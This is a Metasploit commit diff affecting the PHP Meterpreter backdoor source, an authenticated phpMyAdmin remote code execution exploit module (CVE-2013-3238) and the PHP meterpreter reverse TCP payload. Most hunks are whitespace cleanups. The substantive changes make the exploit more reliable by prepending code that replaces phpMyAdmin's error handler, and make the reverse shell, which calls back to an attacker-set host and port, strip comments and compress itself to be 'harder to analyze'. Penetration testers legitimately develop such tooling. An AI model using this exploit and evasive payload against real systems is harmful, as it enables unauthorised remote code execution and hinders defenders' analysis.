Merge pull request #4 from jlee-r7/landing-1772-phpmyadmin

Meatballs1 · Meatballs1 · commit a9183525adb3 · 2013-04-26T14:16:38.000-07:00
Clear out PMA's error handler
diff --git a/data/meterpreter/meterpreter.php b/data/meterpreter/meterpreter.php
@@ -265,7 +265,7 @@ function core_channel_write($req, &$pkt) {
 }
 
 #
-# This is called when the client wants to close a channel explicitly.  Not to be confused with 
+# This is called when the client wants to close a channel explicitly.  Not to be confused with
 #
 function core_channel_close($req, &$pkt) {
     global $channel_process_map;
@@ -297,7 +297,7 @@ function core_channel_close($req, &$pkt) {
     return ERROR_FAILURE;
 }
 
-# 
+#
 # Destroy a channel and all associated handles.
 #
 function channel_close_handles($cid) {
@@ -578,7 +578,7 @@ function handle_dead_resource_channel($resource) {
 
         # Make sure the provided resource gets closed regardless of it's status
         # as a channel
-        remove_reader($resource); 
+        remove_reader($resource);
         close($resource);
     } else {
         my_print("Handling dead resource: {$resource}, for channel: {$cid}");
@@ -822,7 +822,7 @@ function eof($resource) {
         #
         # See http://us2.php.net/manual/en/function.feof.php , specifically this:
         #   If a connection opened by fsockopen() wasn't closed by the server,
-        #   feof() will hang. To workaround this, see below example: 
+        #   feof() will hang. To workaround this, see below example:
         #     <?php
         #     function safe_feof($fp, &$start = NULL) {
         #     ...
@@ -862,7 +862,7 @@ function read($resource, $len=null) {
     #my_print(sprintf("Reading from $resource which is a %s", get_rtype($resource)));
     $buff = '';
     switch (get_rtype($resource)) {
-    case 'socket': 
+    case 'socket':
         if (array_key_exists((int)$resource, $udp_host_map)) {
             my_print("Reading UDP socket");
             list($host,$port) = $udp_host_map[(int)$resource];
@@ -915,13 +915,13 @@ function read($resource, $len=null) {
                     break;
                 }
             }
-            
+
             if ($resource != $msgsock) { my_print("buff: '$buff'"); }
             $r = Array($resource);
         }
         my_print(sprintf("Done with the big read loop on $resource, got %d bytes", strlen($buff)));
         break;
-    default: 
+    default:
         # then this is possibly a closed channel resource, see if we have any
         # data from previous reads
         $cid = get_channel_id_from_resource($resource);
@@ -948,7 +948,7 @@ function write($resource, $buff, $len=0) {
     #my_print(sprintf("Writing $len bytes to $resource which is a %s", get_rtype($resource)));
     $count = false;
     switch (get_rtype($resource)) {
-    case 'socket': 
+    case 'socket':
         if (array_key_exists((int)$resource, $udp_host_map)) {
             my_print("Writing UDP socket");
             list($host,$port) = $udp_host_map[(int)$resource];
@@ -957,7 +957,7 @@ function write($resource, $buff, $len=0) {
             $count = socket_write($resource, $buff, $len);
         }
         break;
-    case 'stream': 
+    case 'stream':
         $count = fwrite($resource, $buff, $len);
         fflush($resource);
         break;
@@ -1107,7 +1107,7 @@ function remove_reader($resource) {
     case 'socket':
         register_socket($msgsock);
         break;
-    case 'stream': 
+    case 'stream':
         # fall through
     default:
         register_stream($msgsock);
@@ -1156,7 +1156,7 @@ function remove_reader($resource) {
                 if ($request) {
                     write($msgsock, $request);
                 }
-            } 
+            }
         }
     }
     # $r is modified by select, so reset it
diff --git a/modules/exploits/multi/http/phpmyadmin_preg_replace.rb b/modules/exploits/multi/http/phpmyadmin_preg_replace.rb
@@ -14,32 +14,35 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'		 => 'PhpMyAdmin Authenticated Remote Code Execution via preg_replace()',
-			'Description'	 => %q{
+			'Name' => 'PhpMyAdmin Authenticated Remote Code Execution via preg_replace()',
+			'Description' => %q{
 					This module exploits a PREG_REPLACE EVAL vulnerability in PhpMyAdmin's
 					replace_prefix_tbl in libraries/mult_submits.inc.php via db_settings.php
 			},
-			'Author'	 =>
+			'Author' =>
 				[
 					'Janek "waraxe" Vind', # Discovery
 					'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module
 				],
-			'License'	 => MSF_LICENSE,
-			'References'	 =>
+			'License' => MSF_LICENSE,
+			'References' =>
 				[
 					[ 'CVE', '2013-3238' ],
 					[ 'PMASA', '2013-2'],
 					[ 'waraxe', '2013-SA#103' ],
 					[ 'URL', 'http://www.waraxe.us/advisory-103.html' ],
 				],
-			'Privileged'	 => false,
-			'Platform'	 => ['php'],
-			'Arch'		 => ARCH_PHP,
-			'Payload'	 =>
+			'Privileged' => false,
+			'Platform'   => ['php'],
+			'Arch'       => ARCH_PHP,
+			'Payload'    =>
 				{
 					'BadChars' => "&\n=+%",
+					# Clear out PMA's error handler so it doesn't lose its mind
+					# and cause ENOMEM errors and segfaults in the destructor.
+					'Prepend' => "function foo($a,$b,$c,$d,$e){return true;};set_error_handler(foo);"
 				},
-			'Targets'	 =>
+			'Targets' =>
 				[
 					[ 'Automatic', { } ],
 				],
@@ -48,7 +51,7 @@ def initialize(info = {})
 
 		register_options(
 			[
-				OptString.new('URI',   [ true,	"Base phpMyAdmin directory path", '/phpmyadmin/']),
+				OptString.new('URI',      [ true, "Base phpMyAdmin directory path", '/phpmyadmin/']),
 				OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
 				OptString.new('PASSWORD', [ false, "Password to authenticate with", ''])
 			], self.class)
@@ -137,7 +140,6 @@ def exploit
 		end
 
 		db = rand_text_alpha(3+rand(3))
-
 		exploit_result = send_request_cgi({
 			'uri'	=> uri('db_structure.php'),
 			'method' => 'POST',
diff --git a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
@@ -33,11 +33,12 @@ def generate
 			f.read(f.stat.size)
 		}
 		met.gsub!("127.0.0.1", datastore['LHOST']) if datastore['LHOST']
-		met.gsub!("4444", datastore['LPORT']) if datastore['LPORT']
-		# XXX When this payload is more stable, remove comments and compress
-		# whitespace to make it smaller and a bit harder to analyze
-		#met.gsub!(/#.*$/, '')
-		#met = Rex::Text.compress(met)
+		met.gsub!("4444", datastore['LPORT'].to_s) if datastore['LPORT']
+
+		# remove comments and compress whitespace to make it smaller and a
+		# bit harder to analyze
+		met.gsub!(/#.*$/, '')
+		met = Rex::Text.compress(met)
 		met
 	end
 end
